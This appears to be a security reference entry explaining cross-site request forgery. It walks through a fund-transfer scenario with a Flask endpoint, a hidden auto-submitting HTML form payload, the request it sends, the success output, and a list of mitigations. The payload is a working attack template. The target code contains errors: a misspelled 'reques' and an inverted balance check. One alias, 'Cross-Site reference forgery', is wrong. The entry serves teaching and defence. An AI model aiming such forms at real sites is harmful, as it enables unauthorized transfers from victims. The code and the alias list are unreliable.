A threat actor may trick an authenticated or trusted victim into executing unauthorized actions on their behalf.

Example #1

1. Threat actor crafts an exploit URL for a fund transfer from a vulnerable website
2. Bob logs in to the vulnerable website (Bob is authenticated - session cookie is saved)
3. Threat actor tricks Bob into clicking on the exploit URL
4. Bob clicks on the exploit URL
5. Bob's browser loads the session cookie and performs a fund transfer

Code

Target-Logic

@app.route("/send_money", methods=["POST"])
@login_required
def send_money():
   ...
   amount = int(request.form.get("amount"))
   to_user = get_user(int(reques.form.get("to_user")))
   if current_user:
      if current_user['balance'] <= amount:
         current_user['balance'] -= amount
         to_user['balance'] += amount
         return make_response({"transfer":"success"}, 200)
   return make_response({"transfer":"failed"}, 200)

Victim-Executes

<html>
  <body>
    <form action="https://test.local/send_money" method="POST">
      <input type="hidden" name="amount" value="1000"/>
      <input type="hidden" name="to_user" value="ABC-999"/>
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

Target-In

amount=1000
to_user=ABC-999

Target-Output

{"transfer":"success"}

Impact

Vary

Risk

• Read & modify data
• Execute commands

Redemption

• Header verification
• Challenge-response
• Anti-csrf tokens
• Same-site cookies

Names

• XSRF
• Sea Surf
• Session Riding
• Cross-Site reference forgery
• Hostile linking

ID

776dd60c-c1de-46a3-a104-25cd836e24b6

References

• wiki